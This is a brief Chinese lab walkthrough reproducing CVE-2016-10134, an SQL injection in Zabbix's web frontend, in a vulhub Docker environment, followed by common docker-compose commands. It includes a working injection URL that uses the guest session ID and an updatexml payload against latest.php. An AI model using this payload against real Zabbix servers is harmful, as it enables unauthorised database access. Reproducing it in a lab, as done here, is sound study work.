声明
好好学习,天天向上
漏洞描述
zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。
影响范围
- 2.2.x
- 3.3.0-3.03
复现过程
这里使用3.0.3版本
使用vulhub
/app/vulhub-master/zabbix/CVE-2016-10134
使用docker启动
docker-compose build
docker-compose up -d
环境启动后,访问
http://192.168.239.129:8080
用账号guest
(密码为空)登录游客账户,不要记住我。
登录后,查看Cookie中的zbx_sessionid
,复制后16位字符:
87ee88a73d9c66dc
访问
http://192.168.239.129:8080/latest.php?output=ajax&sid=87ee88a73d9c66dc&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down